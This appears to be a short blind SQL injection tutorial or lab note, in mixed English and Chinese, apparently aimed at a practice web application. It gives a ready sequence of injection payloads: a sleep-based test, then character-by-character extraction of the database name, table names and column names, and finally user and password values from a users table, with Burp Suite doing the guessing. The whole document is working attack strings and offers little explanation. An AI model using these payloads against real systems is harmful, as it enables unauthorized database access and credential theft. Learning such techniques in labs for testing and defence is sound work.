Boolean blind injection
Determine whether there is sql injection
input content
1' and sleep(5) --
There is a 5s delay in the return result, so there is a sql injection vulnerability
get database name
Instructions for use
if(1>2,1,0) # 判断条件是否成立。成立返回1,不成立返回0
substring('abcd',1,3) #截取字符串第一位开始的三个字符
1. Determine the length of the database
1' and if(length(database())=4,1,0) --
2. Determine the database name
1' and if(substring(database(),2,1)='v',1,0) --
# 截取数据库的第一位判断是否为d
Burpsuite assists in cracking settings
3. Judgment table name
1' and if(substring((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1,1),1,1)='g',1,0) --
use burpsuite
4. Determine the column name
1' and if(substring((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA=database() limit 1,1),1,1)='l',1,0) --
5. Obtain account password
1'and if(substring((select CONCAT(user,0x3a,PASSWORD) from users limit 1),1,1)='a',1,0) --